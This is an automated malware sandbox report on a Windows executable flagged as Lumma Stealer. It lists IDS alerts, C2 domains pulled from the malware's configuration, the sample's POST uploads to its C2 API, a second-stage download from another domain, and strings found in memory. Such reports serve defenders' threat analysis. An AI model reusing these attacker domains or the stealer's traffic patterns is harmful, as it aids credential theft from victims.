Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49976 -> 172.67.219.133:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: leeryspcieu.click
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 172.67.219.133 172.67.219.133

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49975 -> 172.67.219.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49980 -> 172.67.219.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49981 -> 172.67.219.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49977 -> 172.67.219.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49982 -> 172.67.219.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49983 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49976 -> 172.67.219.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49979 -> 172.67.219.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49978 -> 172.67.219.133:443
Source: Network traffic	Suricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 188.114.97.3:443 -> 192.168.2.5:49983

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: leeryspcieu.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: leeryspcieu.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TXBL6FP7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12776Host: leeryspcieu.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RKU1FFS6PEEWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15042Host: leeryspcieu.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0ADCPECMNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20514Host: leeryspcieu.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C6D00O4HZE40U0P76User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1239Host: leeryspcieu.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WEK41AY1KJLIER2YQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 577242Host: leeryspcieu.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: leeryspcieu.click
Source: global traffic	HTTP traffic detected: GET /int_clp_8888.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipjarifaa.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /int_clp_8888.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipjarifaa.shop

Source: global traffic	DNS traffic detected: DNS query: leeryspcieu.click
Source: global traffic	DNS traffic detected: DNS query: klipjarifaa.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: leeryspcieu.click

Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.securetrust.com/issuers/TWGCA.crt0
Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0
Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/TWGCSCA_L1.crl0y
Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981628896.00000000033DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.trustwave.com/TWGCA.crl0n
Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.vikingcloud.com/TWGCA.crl0t
Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.securetrust.com/0?
Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981628896.00000000033DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.trustwave.com/06
Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.vikingcloud.com/0:
Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.vikingcloud.com/0A
Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981628896.00000000033DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://certs.securetrust.com/CA0
Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://certs.securetrust.com/CA05
Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://certs.securetrust.com/CA0:
Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: qnUFsmyxMm.exe, 00000000.00000003.3927008169.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3924090719.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3923676725.0000000003903000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3937503296.0000000003907000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3928482811.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926046976.00000000039EF000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3937004478.0000000003900000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3921152302.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3923794882.00000000039D8000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3925160129.00000000039EB000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3921309363.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3937339896.0000000003B17000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926694212.000000000390A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926282396.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3924759593.00000000039DE000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3938216484.0000000003906000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926797756.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3927226610.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3921831161.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3931951681.0000000003A0A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3928316241.00000000039F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipjarifaa.shop/
Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipjarifaa.shop/-9
Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipjarifaa.shop/=9
Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipjarifaa.shop/int_clp_8888.txt
Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipjarifaa.shop/int_clp_8888.txt%
Source: qnUFsmyxMm.exe, 00000000.00000003.3915518558.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipjarifaa.shop/int_clp_8888.txt0sA
Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipjarifaa.shop/int_clp_8888.txth
Source: qnUFsmyxMm.exe, 00000000.00000003.3868532626.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3894355489.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3872774190.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3808879352.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826083750.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826098111.00000000033E2000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826000118.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3894355489.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://leeryspcieu.click/
Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://leeryspcieu.click/U9
Source: qnUFsmyxMm.exe, 00000000.00000003.3868532626.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://leeryspcieu.click/U:
Source: qnUFsmyxMm.exe, 00000000.00000003.3894490335.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3894545007.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3916188240.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3877870850.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3858760884.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3808879352.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3827057780.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3839965568.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826083750.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981628896.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915518558.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826127163.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3868587610.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3839865359.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3980750648.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826000118.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3839786304.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826704008.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3868532626.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://leeryspcieu.click/api
Source: qnUFsmyxMm.exe, 00000000.00000003.3868532626.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://leeryspcieu.click/apiP
Source: qnUFsmyxMm.exe, 00000000.00000003.3853254066.0000000003362000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://leeryspcieu.click/apix
Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981628896.00000000033DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.trustwave.com/CA03
Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976

Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49982 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49983 version: TLS 1.2

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

Code function: 0_2_007C27A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_007C27A0

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

Code function: 0_2_007C27A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_007C27A0

